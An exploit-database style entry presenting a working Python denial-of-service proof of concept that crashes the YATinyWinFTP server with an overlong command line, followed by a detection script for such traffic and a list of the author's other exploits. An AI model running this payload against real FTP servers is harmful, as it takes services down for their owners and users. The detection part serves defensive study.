Author: strider
Platform: windows
Release date: 2020-11-30
```
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Date: 20.08.2020
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10

------------------------------[Description]---------------------------------

This exploit connects to the FTP service and sends a command which has a size of 256 bytes with a trailing space at the end.
As a result, the service crashes.

-----------------------------[Exploit]---------------------------------------------

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

import socket, sys

# Target host and port are taken from the command line.
target = (sys.argv[1], int(sys.argv[2]))
# Command field of repeated 'A' bytes followed by a single trailing space.
buffer = b'A' * 272 + b'\x20'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
# Read and print the server's greeting banner before sending.
print(s.recv(1024))
s.send(buffer)
s.close()

-----------------------------[how to run]-----------------------------

C:\> TinyWinFTP.exe servepath port

~$ python3 exploit.py targetip port

Boom!
```
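A detection-side counterpart to the PoC above, added here as an example and not part of the original advisory or the YATinyWinFTP project: it inspects the client-to-server bytes of a captured FTP control session and flags lines shaped like the one the PoC sends. The 255-byte ceiling, the function name and the reason labels are assumptions; the verb rule follows RFC 959 (command codes are four or fewer alphabetic characters), and the sample sessions are constructed.

```python
import re

# Assumption: site policy ceiling for one control-channel line; tune as needed.
MAX_LINE = 255
# RFC 959: command codes are four or fewer alphabetic characters.
VERB_RE = re.compile(rb"[A-Za-z]{3,4}")


def inspect_control_stream(data: bytes, max_line: int = MAX_LINE):
    """Return (offset, length, reasons) for each suspicious command line.

    `data` is assumed to be the complete client side of a finished
    control-channel session, so a trailing unterminated line is a finding.
    """
    findings = []
    offset = 0
    while offset < len(data):
        end = data.find(b"\r\n", offset)
        terminated = end != -1
        line = data[offset:end] if terminated else data[offset:]
        reasons = []
        if len(line) > max_line:
            reasons.append("overlong-line")
        if not terminated:
            reasons.append("no-crlf")
        # The verb is everything before the first space (or the whole line).
        verb = line.split(b" ", 1)[0]
        if not VERB_RE.fullmatch(verb):
            reasons.append("bad-verb")
        if reasons:
            findings.append((offset, len(line), reasons))
        offset = end + 2 if terminated else len(data)
    return findings


# Constructed sample sessions (not captured traffic).
BENIGN = b"USER anonymous\r\nPASS guest@example.com\r\nLIST\r\nQUIT\r\n"
# Same shape as the PoC buffer: a long run of 'A' plus one trailing space.
SUSPECT = b"USER anonymous\r\n" + b"A" * 272 + b"\x20"

if __name__ == "__main__":
    for name, session in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_control_stream(session))
```
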
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-11-30 | "YATinyWinFTP - Denial of Service (PoC)" | remote | windows | strider |
2019-09-27 | "InoERP 0.7.2 - Persistent Cross-Site Scripting" | webapps | php | strider |
2019-09-25 | "WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting" | webapps | php | strider |
2019-05-08 | "MiniFtp - 'parseconf_load_setting' Buffer Overflow" | local | linux | strider |
2018-11-26 | "MariaDB Client 10.1.26 - Denial of Service (PoC)" | dos | linux | strider |